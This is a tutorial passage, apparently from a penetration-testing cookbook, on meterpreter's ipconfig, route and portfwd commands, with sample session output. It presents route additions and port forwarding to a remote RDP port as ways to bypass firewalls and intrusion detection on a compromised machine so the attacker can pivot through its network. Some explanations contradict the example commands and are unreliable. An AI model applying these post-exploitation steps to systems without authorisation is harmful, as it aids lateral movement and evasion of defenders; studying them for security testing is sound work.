Using meterpreter networking commands

Meterpreter provides us some useful networking commands as well. These commands can be useful in understanding the network structure of the target user. We can analyze whether the system belongs to a LAN or it is a standalone system. We can also know the IP range, DNS, and other information as well. Such network information can be useful when we have to perform pivoting. Pivoting is a concept by which we can compromise other machines on the same network in which our target is present. We will understand pivoting in our next chapter where we will focus on the advanced use of meterpreter.

Getting ready

Before we get into the recipe, there are three networking terms which we will encounter here. So let us give a quick brush to our memory by looking at the following terms:

• Subnetwork or subnet is the concept of dividing a large network into smaller identifiable parts. Subnetting is done to increase the address utility and security.
• A netmask is a 32-bit mask that is used to divide an IP address into subnets and specify the network's available hosts.
• Gateway specifies the forwarding or the next hop IP address over which the set of addresses defined by the network destination and subnet mask are reachable.

We will be using these three terms when we will deal with the route command.

How to do it...

There are three networking commands provided by meterpreter. These are ipconfig, route, and portfwd. Let us give a quick look at each of them.

The Ipconfig command is used to display all the TCP/IP network configurations of the target machine. It lists information such as the target IP address, hardware MAC, and netmask:

meterpreter > ipconfig
Reliance
Hardware MAC: 00:00:00:00:00:00
IP Address : 115.242.228.85
Netmask : 255.255.255.255
Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

As you can see, the output of ipconfig lists the various active TCP/IP configurations.

The next networking command is the route command. It is similar to the route command of MS DOS. This command is used to display or modify the local IP routing table on the target machine. Executing the route command lists the current table:

meterpreter > route
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 115.242.228.85
115.242.228.85 255.255.255.255 115.242.228.85
127.0.0.0 255.0.0.0 127.0.0.1
127.0.0.1 255.255.255.255 127.0.0.1
127.255.255.255 255.255.255.255 127.0.0.1
192.168.56.0 255.255.255.0 192.168.56.1
192.168.56.1 255.255.255.255 192.168.56.1
192.168.56.255 255.255.255.255 192.168.56.1
224.0.0.0 240.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.56.1
224.0.0.0 240.0.0.0 115.242.228.85
255.255.255.255 255.255.255.255 127.0.0.1
255.255.255.255 255.255.255.255 192.168.56.1
255.255.255.255 255.255.255.255 115.242.228.85

Let us execute the route -h command to figure out how we can modify the table.

meterpreter > route -h
Usage: route [-h] command [args]
Supported commands:
add [subnet] [netmask] [gateway]
delete [subnet] [netmask] [gateway]

If you take a look at the output of the ipconfig command, you can figure out that the IP address 115.242.228.85 is used by the target to connect to the Internet. So we can add a route value to pass the connection through 115.242.228.85 as the gateway. This can provide us a firewall bypass on the target machine:

meterpreter > route add 192.168.56.2 255.255.255.255 192.168.56.1
Creating route 192.168.56.2/255.255.255.255 -> 192.168.56.1

Similarly, we can use the delete command to remove a route from the table.

Let's move to the last networking command—portfwd. This command is used to forward incoming TCP and/or UDP connections to remote hosts. Consider the following example to understand port forwarding.

Consider host "A", host "B" (in the middle), and host "C". Host A should connect to host C in order to do something, but if for any reason it's not possible, host B can directly connect to C. If we use host B in the middle, to get the connection stream from A and pass it to B while taking care of the connection, we say host B is doing port forwarding.

This is how things will appear on the wire: host B is running a software that opens a TCP listener on one of its ports, say port 20. Host C is also running a listener that is used to connect to host B when a packet arrives from port 20. So, if A sends any packet on port 20 of B, it will automatically be forwarded to host C. Hence, host B is port forwarding its packets to host C.

How it works...

To start port forwarding with a remote host we can add a forwarding rule first. Consider the following command line:

Meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h 69.54.34.38 -p 3389

Notice the different command parameters. With the -a parameter we can add a new port forwarding rule. The -L parameter defines the IP address to bind a forwarded socket to. As we're running these all on host A, and want to continue our work from the same host, we set the IP address to 127.0.0.1.

-l is the port number which will be opened on host A, for accepting incoming connections. -h defines the IP address of host C, or any other host within the internal network. -p is the port you want to connect to, on host C.

This was a simple demonstration of using port forwarding. This technique is actively used to bypass firewalls and intrusion detection systems.